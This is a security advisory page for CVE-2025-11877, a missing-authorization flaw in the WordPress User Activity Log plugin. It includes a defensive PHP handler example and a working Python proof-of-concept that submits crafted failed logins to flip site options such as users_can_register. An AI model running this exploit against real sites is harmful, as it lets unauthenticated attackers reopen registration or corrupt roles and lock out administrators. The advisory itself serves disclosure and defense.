Security Vulnerability Report
CVE-2025-11877 CVSS 7.5 HIGH

Published: 2026-01-07 12:16:46
Last Modified: 2026-04-15 00:35:42

Description

The User Activity Log plugin is vulnerable to a limited options update in versions up to, and including, 2.2. The failed-login handler 'ual_shook_wp_login_failed' lacks a capability check and writes failed usernames directly into update_option() calls. This makes it possible for unauthenticated attackers to push select site options from 0 to a non-zero value, allowing them to reopen registration or corrupt options like 'wp_user_roles', breaking wp-admin access. CVE-2025-13471 appears to be a duplicate of this CVE.
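As an added defender-side example (not the plugin's code and not part of the original report): a wp_login_failed handler written so that the attempted username is only ever stored as data under a fixed option key, which is the root-cause fix for the pattern the advisory describes. The callback name example_record_failed_login and the option key example_failed_logins are hypothetical.

```php
<?php
// Added example, not the User Activity Log plugin's code. It shows the safe
// shape for a wp_login_failed handler: the attempted username is stored as
// DATA under a fixed option key and never used as the option NAME.
//
// The advisory describes the unsafe pattern as the failed username flowing
// straight into update_option(); illustratively (not the plugin's exact code):
//   update_option( $username, ... );   // the visitor chooses which option is written
//
// wp_login_failed fires for unauthenticated visitors by design, so the handler
// must treat its argument as untrusted input.

add_action( 'wp_login_failed', 'example_record_failed_login' );

function example_record_failed_login( $username ) {
    // Normalise the input so it is only ever treated as a value to log.
    $attempted = sanitize_user( (string) $username, true );
    if ( '' === $attempted ) {
        $attempted = '(empty)';
    }

    // Fixed, hard-coded option key (hypothetical name); visitor input never
    // reaches the first argument of get_option() / update_option().
    $log = get_option( 'example_failed_logins', array() );
    if ( ! is_array( $log ) ) {
        $log = array(); // repair a corrupted value rather than trusting it
    }

    $ip = isset( $_SERVER['REMOTE_ADDR'] )
        ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
        : '';

    $log[] = array(
        'user' => $attempted,
        'ip'   => $ip,
        'time' => current_time( 'mysql', true ),
    );

    // Keep the option bounded so unauthenticated traffic cannot grow it without
    // limit, and do not autoload it on every page request.
    update_option( 'example_failed_logins', array_slice( $log, -200 ), false );
}
```

Nothing in this handler can reach users_can_register, wp_user_roles or any other option named by the visitor, which is the property a patched version of the plugin needs.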

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Affected product: User Activity Log WordPress plugin <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-11877 PoC - Unauthorized Options Update
# Target: WordPress with User Activity Log plugin <= 2.2


def exploit_options_update(target_url, option_name='users_can_register'):
    """
    Exploit the missing capability check in ual_shook_wp_login_failed
    Allows unauthenticated attackers to toggle site options from 0 to non-zero
    """
    # Target WordPress login endpoint
    login_url = target_url.rstrip('/') + '/wp-login.php'

    # Payload: Send failed login with crafted username that triggers option update
    # The username parameter is directly used in update_option() call
    payload = {
        'log': option_name,   # Option name to modify
        'pwd': '0',           # Any password to trigger failed login
        'wp-submit': 'Log In',
        'redirect_to': '',
        'testcookie': '1'
    }

    print(f'[*] Target: {target_url}')
    print(f'[*] Exploiting CVE-2025-11877...')
    print(f'[*] Attempting to modify option: {option_name}')

    try:
        # Send POST request to trigger failed login handler
        session = requests.Session()
        response = session.post(login_url, data=payload, timeout=10)
        if response.status_code == 200:
            print(f'[+] Request sent successfully')
            print(f'[+] Check if {option_name} was modified on the target site')
            return True
    except requests.RequestException as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        print(f'Example: python {sys.argv[0]} http://target.com')
        sys.exit(1)
    target = sys.argv[1]
    exploit_options_update(target)
```

References

https://plugins.trac.wordpress.org/browser/user-activity-log/trunk/user-functions.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/24225f47-cec2-4270-88f0-8696ebfb7168?source=cve

Record Details (from the raw JSON data)

Vulnerability Status: Deferred
Weakness: CWE-862 (Missing Authorization)
CVSS v3.1 Metric Type: Secondary
Exploitability Score: 3.9
Impact Score: 3.6